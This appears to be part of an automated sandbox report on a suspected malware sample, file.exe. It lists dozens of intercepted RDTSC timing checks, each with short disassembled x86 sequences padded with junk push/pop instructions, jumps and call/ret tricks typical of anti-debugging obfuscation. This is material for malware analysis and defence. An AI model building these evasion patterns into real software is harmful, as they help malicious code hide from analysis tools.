                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7ECA second address: 5D7ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8C82 second address: 5D8CAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F2398D03456h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F2398D03463h 0x00000016 popad 0x00000017 jng 00007F2398D0345Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7ED0 second address: 5D7F4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12458113h], ebx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jmp 00007F239852C067h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 cld 0x00000025 mov eax, dword ptr [ebp+122D0CC9h] 0x0000002b mov ebx, 0340600Fh 0x00000030 push FFFFFFFFh 0x00000032 mov edi, 1A0944F0h 0x00000037 nop 0x00000038 jno 00007F239852C076h 0x0000003e push eax 0x0000003f jng 00007F239852C060h 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAE25 second address: 5DAE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jl 00007F2398D03456h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9FC9 second address: 5D9FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAE35 second address: 5DAE3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D9FCD second address: 5D9FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F239852C058h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DCCBF second address: 5DCCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBF2A second address: 5DBF3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F239852C05Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEDBA second address: 5DEDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEDBE second address: 5DEDE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F239852C05Dh 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E0D8C second address: 5E0D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DCE3F second address: 5DCE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DDF36 second address: 5DDF3B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEFA6 second address: 5DEFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F239852C056h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F239852C064h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DFF9C second address: 5DFFA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DCE43 second address: 5DCE49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DFFA2 second address: 5DFFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DCE49 second address: 5DCE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E1DE2 second address: 5E1DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DF075 second address: 5DF079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E1DE6 second address: 5E1DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E1DF7 second address: 5E1E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E1E0C second address: 5E1E12 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E1E12 second address: 5E1E8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F239852C056h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F239852C058h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov di, ax 0x0000002a sbb ebx, 1341B77Dh 0x00000030 push 00000000h 0x00000032 call 00007F239852C062h 0x00000037 mov edi, dword ptr [ebp+122D364Dh] 0x0000003d pop ebx 0x0000003e and edi, dword ptr [ebp+122D1C9Ch] 0x00000044 push 00000000h 0x00000046 cmc 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b je 00007F239852C056h 0x00000051 jmp 00007F239852C068h 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E0F18 second address: 5E0F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E0F1C second address: 5E0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 jc 00007F239852C058h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 nop 0x00000013 jmp 00007F239852C065h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f clc 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F239852C058h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov di, si 0x00000044 cmc 0x00000045 mov eax, dword ptr [ebp+122D129Dh] 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F239852C058h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000017h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 jmp 00007F239852C05Ch 0x0000006a push FFFFFFFFh 0x0000006c cld 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F239852C068h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E0FC2 second address: 5E0FC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2028 second address: 5E2032 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2032 second address: 5E20CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D36F1h] 0x00000012 mov ebx, dword ptr [ebp+122D2521h] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov bl, DFh 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F2398D03458h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov eax, dword ptr [ebp+122D0705h] 0x00000048 jmp 00007F2398D03463h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F2398D03458h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 mov ebx, dword ptr [ebp+122D2135h] 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jnc 00007F2398D03456h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E20CD second address: 5E20E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3D22 second address: 5E3D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03460h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2398D0345Dh 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jne 00007F2398D03465h 0x0000001b nop 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D2981h], eax 0x00000024 push 00000000h 0x00000026 jmp 00007F2398D03467h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3D88 second address: 5E3D97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3D97 second address: 5E3D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3D9D second address: 5E3DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E6CFE second address: 5E6D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3EF4 second address: 5E3F1D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F239852C069h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E3FDD second address: 5E3FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 587BDF second address: 587C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F239852C066h 0x0000000b jmp 00007F239852C05Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 587C09 second address: 587C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2398D03462h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 587C21 second address: 587C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C063h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EE5E2 second address: 5EE5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D0345Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EE5F3 second address: 5EE5FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F239852C056h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EE5FD second address: 5EE615 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2398D03456h 0x00000008 jno 00007F2398D03456h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F2398D03456h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EE615 second address: 5EE629 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C060h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EE75D second address: 5EE782 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2398D03456h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2398D03469h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EE8F9 second address: 5EE904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F239852C056h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F4DE1 second address: 5F4DF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F2398D03456h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F4DF5 second address: 5F4E1A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F239852C069h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FAA2C second address: 5FAA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F9EE3 second address: 5F9EE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FA210 second address: 5FA216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FA4DB second address: 5FA4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F239852C05Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FA4EC second address: 5FA4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6002B1 second address: 6002B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 586032 second address: 586048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03462h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF132 second address: 5FF186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C068h 0x00000009 ja 00007F239852C056h 0x0000000f jmp 00007F239852C060h 0x00000014 popad 0x00000015 jo 00007F239852C058h 0x0000001b push edi 0x0000001c pop edi 0x0000001d jmp 00007F239852C05Ah 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 jmp 00007F239852C05Ah 0x0000002b pop ecx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF186 second address: 5FF18B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF18B second address: 5FF193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FF740 second address: 5FF74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2398D0345Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFA28 second address: 5FFA6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F239852C072h 0x0000000e jmp 00007F239852C060h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jg 00007F239852C056h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFA6E second address: 5FFA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFA72 second address: 5FFA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 je 00007F239852C056h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFA81 second address: 5FFA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFA8B second address: 5FFA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFC0B second address: 5FFC14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFD64 second address: 5FFD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFD68 second address: 5FFD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FFD6E second address: 5FFD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602477 second address: 602483 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2398D03456h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60574A second address: 605753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609D2E second address: 609D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2398D03464h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609D4B second address: 609D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609D4F second address: 609D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2398D03456h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609EC2 second address: 609ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609ECE second address: 609EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F2398D03462h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609EED second address: 609EF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 609EF9 second address: 609EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60A065 second address: 60A06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60AA5C second address: 60AA61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60AA61 second address: 60AA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F239852C056h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60AD30 second address: 60AD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60AD36 second address: 60AD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB122 second address: 5AB142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F2398D03468h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB142 second address: 5AB153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F239852C058h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB153 second address: 5AB157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB157 second address: 5AB15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60B19D second address: 60B1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D03462h 0x00000009 rdtsc
